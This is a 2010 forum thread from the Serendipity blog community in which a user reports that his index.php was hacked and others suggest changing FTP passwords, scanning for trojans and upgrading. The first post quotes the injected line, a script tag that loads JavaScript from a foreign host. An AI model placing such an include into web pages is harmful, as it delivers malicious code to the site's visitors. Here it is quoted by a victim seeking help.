Serendipity Forums

User and developer community
https://board.s9y.org/

Hacked index.php

https://board.s9y.org/viewtopic.php?t=16823

Page 1 of 1

Hacked index.php

Posted: Tue Jun 22, 2010 1:54 pm
by sehpferd
Dear All,

Correction! Not .tpl, .php

during the last two days, my index.php file has been hacked, I believe not within my ftp account, by a foraiegn website, addig a code as follows:

<script type="text/javascript" src="http://iopap.upperdarby26.com/Kerning.js"></script>

The day before yesterday, it was quite the same, just with another code. Both codes have not been just added, but detryoyed the complete performance of my website. I reloaded my safety copy, so nothing can be seen on my website now.

I run rel. 1.4.1 and updated to 1.5 after the second attack.

Has anyone experienced something similar? And how can I protect this file from beeing re-written?


Best wishes from Hungary and thanks for your answers in advance.

Sehpferd

Re: Hacked index.tpl

Posted: Tue Jun 22, 2010 2:01 pm
by onli
To which version exactly did you upgrade? Did you change all your passwords? Had a look for other modified or added files?

Re: Hacked index.tpl

Posted: Tue Jun 22, 2010 2:31 pm
by garvinhicking
Hi!

You definitely need to at least change your FTP account password! That is most probable the way the hackers change your index.php.

Also, definitely scan your computer (NOT the server) for viri and trojaners. You might have a password sniffer on your computer.

Regards,
Garvin

Re: Hacked index.php

Posted: Tue Jun 22, 2010 4:13 pm
by sehpferd
@ Garvin:

Thanks very much fo the hint, but it is very, very unlikely that some is interested to put an advertisement on my website that will destroy the complete code - that makes no sense. It seems to me that index.php has been hacked automatically by a robot, and if it is possible to destryo my blog, othre blogs my well be affected as well.

Of course I check for Trojans and such things every day, so I do not really believe it is my fault or caused by my computer. I ran serendipity 1.4.1 when it happened and now I'm running 1.5.3, by the way and I use the Plus9 template.

So are there any other suggestions?

Best wishes

Gebhard

Re: Hacked index.php

Posted: Wed Jun 23, 2010 1:03 pm
by garvinhicking
Hi!

Yes, I of course also meant it was automatted through those trojans use any FTP account they can find, search for any index.php they can find, and insert their malware.

Serendipity 1.4.1 could be used as an attack vector, which is why after the upgrade you must change your passwords because otherwise, the current access might still be used.

Regards,
Garvin
All times are UTC+02:00
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited